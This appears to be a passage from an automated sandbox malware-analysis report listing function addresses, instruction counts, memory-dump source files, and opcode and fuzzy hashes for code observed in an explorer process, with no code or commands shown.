                                                              • Opcode ID: a07117a31ee53f18a1ebd67ed3065633e0d15e274e2a34bd7e961ab155dfe7ef
                                                              • Instruction ID: 2fd105521e202f432b0bf6172ad3a690e6d9642d90f5bb8ba37e3721e394b04b
                                                              • Opcode Fuzzy Hash: a07117a31ee53f18a1ebd67ed3065633e0d15e274e2a34bd7e961ab155dfe7ef
                                                              • Instruction Fuzzy Hash: C5810A76A0C69A4FE751EB78D4B96FA7BA0FF52314F0801BBC048DB193DE296845C741
                                                              Function 00007FFD342E083D Relevance: .2, Instructions: 187COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.3587727674.00007FFD342E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd342e0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bfc02b980325dbc2e0e738fedd796590228da46e8ca3d95be00a5427179243ed
                                                              • Instruction ID: 30fd642ec5696e6a7a0e604d2847b3224cd7e9f787a635e47e82b5a95947693b
                                                              • Opcode Fuzzy Hash: bfc02b980325dbc2e0e738fedd796590228da46e8ca3d95be00a5427179243ed
                                                              • Instruction Fuzzy Hash: C8514F36F0C6548FD7A0EF6C84956AA77E0FF5A314F09017BE149D7292DE28A8468741
                                                              Function 00007FFD342E1C45 Relevance: .1, Instructions: 124COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.3587727674.00007FFD342E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd342e0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3f73421fbefc62c167d8121813bcf57e90e62b3acd1bb4e8befe664f377184dd
                                                              • Instruction ID: dbf61d5fe2d4d21566c27a96ffa058967becc7204bbf19c9324ecdb93be0d602
                                                              • Opcode Fuzzy Hash: 3f73421fbefc62c167d8121813bcf57e90e62b3acd1bb4e8befe664f377184dd
                                                              • Instruction Fuzzy Hash: 7C41B271A04A8D9FF798EB28D4A97F57AD0EB55308F50417ED00DEB3A2DABD244D8740
                                                              Function 00007FFD342E155D Relevance: .1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.3587727674.00007FFD342E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd342e0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 00290216a67746e68ca5cf725a71062e179dcde11dbb5f87e4f220c2dcf6a3b2
                                                              • Instruction ID: 51b92ff302c3ea43ba04d6bf781989f772291b4f0ac661906bb7ee286b413976
                                                              • Opcode Fuzzy Hash: 00290216a67746e68ca5cf725a71062e179dcde11dbb5f87e4f220c2dcf6a3b2
                                                              • Instruction Fuzzy Hash: C831E539B0C2498FE711FBB8D8652EDBBB0EF52321F1841B7C254D7182DA385989C791
                                                              Function 00007FFD342E12E8 Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.3587727674.00007FFD342E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd342e0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3c13c688bd301fa0ac7c70e080b05cc0a15409644bdcf0f33b428879bfd2583
                                                              • Instruction ID: 46b5bbbb075fc92b0e6766c52e45158c5e9a498c0b00fb1d7e1068eca8c12eed
                                                              • Opcode Fuzzy Hash: a3c13c688bd301fa0ac7c70e080b05cc0a15409644bdcf0f33b428879bfd2583
                                                              • Instruction Fuzzy Hash: 46212920F18A594FE794F76C54AD67A77C6DB99315F5800B9E50DD32D3CC1CAC858280
                                                              Function 00007FFD342E0CB9 Relevance: .1, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.3587727674.00007FFD342E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd342e0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 94fef5da1545e46dbeb17f5b5fce97ec6883ad7a6828f9ff9c6902a4bf53ca39
                                                              • Instruction ID: beede083f0a0c5145cccb684dcf093fcc034c294cbb56a352040c968464fed48
                                                              • Opcode Fuzzy Hash: 94fef5da1545e46dbeb17f5b5fce97ec6883ad7a6828f9ff9c6902a4bf53ca39
                                                              • Instruction Fuzzy Hash: F621BB55B0D36A06E379512C6CB12767BD1DF86200F1C017AE1DAC22C3EC0EA8876390
                                                              Function 00007FFD342E0868 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.3587727674.00007FFD342E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd342e0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e50fc5aab58e4eadc703415ac116c9dc0264e0acc7c2c279ebce13d0f6135300
                                                              • Instruction ID: 381b4d1a07966c422bda7b2db8bb88dd934109ab5e3f6d86eeb95030fa38e00f
                                                              • Opcode Fuzzy Hash: e50fc5aab58e4eadc703415ac116c9dc0264e0acc7c2c279ebce13d0f6135300
                                                              • Instruction Fuzzy Hash: 52113A3295C7584FD761EF2884594EB7BE0FB4A319F14023FF69AD3241DA3498468782
                                                              Function 00007FFD342E1588 Relevance: .1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.3587727674.00007FFD342E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd342e0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 63782ac2fef8f68c6a33e1ac86476b257ab27e5646e156f2b40564489c5dfc96
                                                              • Instruction ID: 2e4c7e0b6e714208837e5dcfc8708ca6b2a39bce528bda26a830b45fb5cd5a55
                                                              • Opcode Fuzzy Hash: 63782ac2fef8f68c6a33e1ac86476b257ab27e5646e156f2b40564489c5dfc96
                                                              • Instruction Fuzzy Hash: 7211E539B0C7898FE702EB74C8611DDBBB0EF42311F1945B3C154DB192EA385A89C780
                                                              Function 00007FFD342E1E1D Relevance: .1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.3587727674.00007FFD342E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd342e0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 77e9e8a2973d2e868ad0c85a9d243a6585a8ef2f401e039d9fe358367821afa9
                                                              • Instruction ID: 170436fc1ac65fcb2bf462f6382fd30213a3bc4ce7239a8948c04b376ba8b7ad
                                                              • Opcode Fuzzy Hash: 77e9e8a2973d2e868ad0c85a9d243a6585a8ef2f401e039d9fe358367821afa9
                                                              • Instruction Fuzzy Hash: F401F92498D6D64FD31A5BB09C715F27BE5DF4B21470D01FAE199CB1A3CC4D5886C3A1
                                                              Function 00007FFD342E1590 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.3587727674.00007FFD342E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd342e0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9885fec8cb63504b866e56f19c21833f2becc92f171716675af2c5297d263fc5
                                                              • Instruction ID: 9565cd6e3611224b697b7a0756f33f84c56925cb16da0b259cb5a7ab2354394b
                                                              • Opcode Fuzzy Hash: 9885fec8cb63504b866e56f19c21833f2becc92f171716675af2c5297d263fc5
                                                              • Instruction Fuzzy Hash: AD01A139B087898FE702EB74C4601DEBBB0EF46310F1941B7C144DB192EA385A89C780
                                                              Function 00007FFD342E1598 Relevance: .0, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.3587727674.00007FFD342E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd342e0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 19741faf978481d4047bd1dea3acb75bf847ffe075536d1524a99f06d74c2006
                                                              • Instruction ID: f710eb973a7a3d40ea9b2f8129909e4cec59ee15a9ae1b927f41f15443c4e796
                                                              • Opcode Fuzzy Hash: 19741faf978481d4047bd1dea3acb75bf847ffe075536d1524a99f06d74c2006
                                                              • Instruction Fuzzy Hash: 3F015235A0D3899FD712EB74C4645AEBBB0EF47310F1941F6D144DB192EA385989C781
                                                              Function 00007FFD342E15A0 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.3587727674.00007FFD342E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd342e0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a783c14cf2faa05e5d90d02ac4b0455585fdbc549ac7b258acb01474bbc47ed2
                                                              • Instruction ID: 8fb5c6647558e850606277738792c438c10159903fbf45e1398aca44757f5343
                                                              • Opcode Fuzzy Hash: a783c14cf2faa05e5d90d02ac4b0455585fdbc549ac7b258acb01474bbc47ed2
                                                              • Instruction Fuzzy Hash: AA014F34A0D3899FE712DB74C4A45AEBFB0AF07314F1942F6D045DB192EA385A84D781
                                                              Function 00007FFD342E1E50 Relevance: .0, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.3587727674.00007FFD342E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd342e0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 618f3124807878e802589edbe4801ea8c3f9e580c5bd38060a88a6bba2db8b12
                                                              • Instruction ID: 2dbf423a78ea44b0feadaf77c3e55363544a4d71741417bf1fb74862c9e9075a
                                                              • Opcode Fuzzy Hash: 618f3124807878e802589edbe4801ea8c3f9e580c5bd38060a88a6bba2db8b12
                                                              • Instruction Fuzzy Hash: 26E02625B4C85906D77CBAB468716B17280DB49218B08017AD01AC2283CC0D5CC18280
                                                              Function 00007FFD342E4D19 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.3587727674.00007FFD342E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd342e0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e881298cfd14e8c9150868562bd47c6cd504156f1e4f731a20d79e8f392c0259
                                                              • Instruction ID: 03edcbf4556a4a28b8d6014ae0eacf59b85e21a0921b4ae1b09e2e9570dd198d
                                                              • Opcode Fuzzy Hash: e881298cfd14e8c9150868562bd47c6cd504156f1e4f731a20d79e8f392c0259
                                                              • Instruction Fuzzy Hash: 98E01224F0802A46FB559644C8A0BBA6250EF59300F1440B4DB4EF33C2CD3DAEC5EB65
                                                              Function 00007FFD342E2759 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.3587727674.00007FFD342E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd342e0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f25bf48d738141d6563eaf8c753df2a608beffa0d9b8bf9c7b700eaadf556e77
                                                              • Instruction ID: 897599332fcfa7d494bd9b2c5a9d956f8b6fe9fb9e5dccf2bc1fc8b7de18b17c
                                                              • Opcode Fuzzy Hash: f25bf48d738141d6563eaf8c753df2a608beffa0d9b8bf9c7b700eaadf556e77
                                                              • Instruction Fuzzy Hash: 53D0A735E085554BDB90CA04C4E4759B791FB18300F1842E4C40DE3242C639EEC1FB50
                                                              Function 00007FFD342E1765 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.3587727674.00007FFD342E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd342e0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cba79f2dbca1c696d37c7b5fc20d58c59afe4a8b7d73ad09e99c4b4acf299eed
                                                              • Instruction ID: b4d7b1d0dfd653c5b7bc60aa450f86bccc258e3b5b07e6e58278634b42d45b55
                                                              • Opcode Fuzzy Hash: cba79f2dbca1c696d37c7b5fc20d58c59afe4a8b7d73ad09e99c4b4acf299eed
                                                              • Instruction Fuzzy Hash: C5C08C38616809CFC908EB2DC89890837B0FB0B304BC600A0E10DC7271D21ADCC2D781
                                                              Function 00007FFD342E0705 Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.3587727674.00007FFD342E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd342e0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a639b3564ed9c4d7f08e483827c598cc53053e9eb7a6ba061c0ad34698e08247
                                                              • Instruction ID: 62aba8f1ee06e870ca00652b6f3f6016d62a0c8e8a778dec332a038da0eb7705
                                                              • Opcode Fuzzy Hash: a639b3564ed9c4d7f08e483827c598cc53053e9eb7a6ba061c0ad34698e08247
                                                              • Instruction Fuzzy Hash: 73C08C0DF0A82B40A920316918E60BEA1009BCA210FDC00B2D30CE00C2AC1F24C62582
                                                              Function 00007FFD342E0728 Relevance: .0, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.3587727674.00007FFD342E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd342e0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                              • Instruction ID: 5b07a16629d13aef2eb37eed11ed237d37dba04ad91656edc9d06c3521f82857
                                                              • Opcode Fuzzy Hash: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                              • Instruction Fuzzy Hash: 18B01208D5780F00AD1431750CD7075B4005B86100FCC0170E608D00C3DC4F10D42242

                                                              Executed Functions

                                                              Function 00007FFD34310A19 Relevance: .3, Instructions: 281COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.3605664292.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd34310000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 11e125dc1f10669c5fac05e0a858a6020eac4a491909874394e5d89509500c20
                                                              • Instruction ID: 2d8e9d4b965ecc2e4b07b23f5d12cc650cf956b185bdc903b964bcbabad5db3f
                                                              • Opcode Fuzzy Hash: 11e125dc1f10669c5fac05e0a858a6020eac4a491909874394e5d89509500c20
                                                              • Instruction Fuzzy Hash: B4714812B5DA8A0AE368763D18A52F976D2DF8B311F25027ED5DFC36C3DC2CA8079245
                                                              Function 00007FFD34311A0D Relevance: .2, Instructions: 233COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.3605664292.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd34310000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b7d2cdc0714db95d6ce02ff767f849aad4b977176f197a6109c16a11bf8a7cf4
                                                              • Instruction ID: c3d8d62e4638bbd1966316795086b86d05981792e03af56893e5ac87f08f4723
                                                              • Opcode Fuzzy Hash: b7d2cdc0714db95d6ce02ff767f849aad4b977176f197a6109c16a11bf8a7cf4
                                                              • Instruction Fuzzy Hash: 5981DB62A0D69A4FEB51EB68D8B52E97FA0FF57310F0801B7D048D71A3DD386445C741
                                                              Function 00007FFD3431083D Relevance: .2, Instructions: 187COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.3605664292.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd34310000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a02690f65fcec5a6277bc7340251467d7b3d8df09064c93386b3666e501341ee
                                                              • Instruction ID: b047af46aee835a79c4e7fd3b1065b37468b0558eb780e602cd47ad43a733769
                                                              • Opcode Fuzzy Hash: a02690f65fcec5a6277bc7340251467d7b3d8df09064c93386b3666e501341ee
                                                              • Instruction Fuzzy Hash: 44511A32F4C6588FE7A0FB2C84A56EA77E0FF5A311B05417AE599C72A2DE389841C741
                                                              Function 00007FFD34311C45 Relevance: .1, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.3605664292.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd34310000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a96bce3d8131c0ec586bbd5cb3f91bc2401073d898fbdfbbafad629b87e056ff
                                                              • Instruction ID: d54a0c59fcb2187f7267238392d30fe04b84efdb83367e3a1ab4dc31df223284
                                                              • Opcode Fuzzy Hash: a96bce3d8131c0ec586bbd5cb3f91bc2401073d898fbdfbbafad629b87e056ff
                                                              • Instruction Fuzzy Hash: B7419271A05A8D8FF794DF18D8A93FA3EE0EB5A305F50017ED009E73A2DABD24458741
                                                              Function 00007FFD3431155D Relevance: .1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.3605664292.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd34310000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5ac8f9fca424b6ac8f96b17dd7c79f524c6b89960ced8fe55a95a387514b4fa8
                                                              • Instruction ID: 8c348678857b2b55752105c720a14162e508d064820a3530e1fcf2180f4e8a1c
                                                              • Opcode Fuzzy Hash: 5ac8f9fca424b6ac8f96b17dd7c79f524c6b89960ced8fe55a95a387514b4fa8
                                                              • Instruction Fuzzy Hash: 3D31C236B0D2898FEB11FBA8D8652D8BBB0EF47321F1841B7C155C7182DA395549CB91
                                                              Function 00007FFD343112E8 Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.3605664292.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd34310000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cd672120fb6428eda3c27b4093f1fdf42e4ff3f997d5ab4672fbe4f1aca4d889
                                                              • Instruction ID: 9dce2abfdc8033489ed2402744d4abd15d008e466b30ac9e585e11384c630dbd
                                                              • Opcode Fuzzy Hash: cd672120fb6428eda3c27b4093f1fdf42e4ff3f997d5ab4672fbe4f1aca4d889
                                                              • Instruction Fuzzy Hash: E221F921B5895D0FFB98F76C54A967976C6EB9E311F5400B9E80DC32D3DC3C9C418281
                                                              Function 00007FFD34310CB9 Relevance: .1, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.3605664292.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd34310000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 256420aec1ad9ab30854e83d064619a46b3278a6132e93da082f59897341ab0c
                                                              • Instruction ID: 9b965e2f3437710d2153d9da9f720f62e44ea24b1c98998ee95584185f973411
                                                              • Opcode Fuzzy Hash: 256420aec1ad9ab30854e83d064619a46b3278a6132e93da082f59897341ab0c
                                                              • Instruction Fuzzy Hash: 1821B761B4D39606E378712C6CB12B47FF1DF87200F18017AE09AC7AC3EC2DA815A380
                                                              Function 00007FFD34310868 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.3605664292.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd34310000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7ec719b589b4f8ffeab7a4747d65e0deca6b570f9005de09fcbc0e066b7c70c1
                                                              • Instruction ID: 2b59530d89ba051a880a620fdb6f60a193e0d13f41b40e2da237ee38eb646b08
                                                              • Opcode Fuzzy Hash: 7ec719b589b4f8ffeab7a4747d65e0deca6b570f9005de09fcbc0e066b7c70c1
                                                              • Instruction Fuzzy Hash: 7511273299C7584FD761BB2844994EA7BF0FF4E215F10053FE99AC3281DA3494058782
                                                              Function 00007FFD34311E1D Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.3605664292.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd34310000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 91aa4371ce9497523b447a9db25833bfe991e2ad46524770b6a34c90ce57c620
                                                              • Instruction ID: 86f124c5c78e5bce9494058d9a757e53af057d89f63fc3fb95eb3fbec8b394b9
                                                              • Opcode Fuzzy Hash: 91aa4371ce9497523b447a9db25833bfe991e2ad46524770b6a34c90ce57c620
                                                              • Instruction Fuzzy Hash: B801F21198E6D50FD72666A48CB16E27FE4CF8F51070901FAD086CB4A3CC5D5882C361
                                                              Function 00007FFD34311588 Relevance: .1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.3605664292.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd34310000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 25faceeb3ca76dfa865c6a9df3b7204186dff8ff1c23f5cdb14a31e8ef631877
                                                              • Instruction ID: 1d3e317fae429a6b52c3fa8bbc98e1cde8604ed8e5f0e00dc1f600c6fce60f40
                                                              • Opcode Fuzzy Hash: 25faceeb3ca76dfa865c6a9df3b7204186dff8ff1c23f5cdb14a31e8ef631877
                                                              • Instruction Fuzzy Hash: E011AC35B096898FEB02FBB8D8A11D9BFB0EF47310F1941B7C090D7182E638565ACB81
                                                              Function 00007FFD34311590 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.3605664292.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd34310000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54e1577b2cc94440e404aeda3bb841f21fb33c2a00dff6cc5999f8eba22f98a1
                                                              • Instruction ID: 3f8523eab045a432cd30afe0124618f5a59e70b78eae65415b461f66c184d20d
                                                              • Opcode Fuzzy Hash: 54e1577b2cc94440e404aeda3bb841f21fb33c2a00dff6cc5999f8eba22f98a1
                                                              • Instruction Fuzzy Hash: D601AD35B096888FEB02FB78C8A11D9BFB0EF07310F1841E7C095D7192DA385649CB81
                                                              Function 00007FFD34311598 Relevance: .0, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.3605664292.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd34310000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b1be3e5329b87d62feeb213cfeaa8623c886ad79ed70c8d26b966fda3044c93
                                                              • Instruction ID: 558bd3a3f95f1baab41ee63120ee4a6c343d9739cd5fc94c03d5c19d6e84f025
                                                              • Opcode Fuzzy Hash: 2b1be3e5329b87d62feeb213cfeaa8623c886ad79ed70c8d26b966fda3044c93
                                                              • Instruction Fuzzy Hash: 2A015E35A0D6898FDB02FB78C8A01D9BFB0EF07310F1842E6D185D7192D9385649C745
                                                              Function 00007FFD343115A0 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.3605664292.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd34310000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 333187a0137b63e0a6ad44368464a8f9721890856fc733ed025897b5875e1633
                                                              • Instruction ID: 642638c1666e5eee687134263f6790e335071151d4bfe7d2f67fd880e589f929
                                                              • Opcode Fuzzy Hash: 333187a0137b63e0a6ad44368464a8f9721890856fc733ed025897b5875e1633
                                                              • Instruction Fuzzy Hash: A3016234A4D2899FEB12EB74C8A41DD7FB0AF07304F1842E6D145D7193D93C5A44D745
                                                              Function 00007FFD34311E50 Relevance: .0, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.3605664292.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd34310000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 297842779df3f934e7ce00bfca479be4166b8696bd687055b9d5075be398b442
                                                              • Instruction ID: b075b02c2c6bf5544cc0b800f51ead1f966d27e19bcc640e9ef5a1e0e498c38e
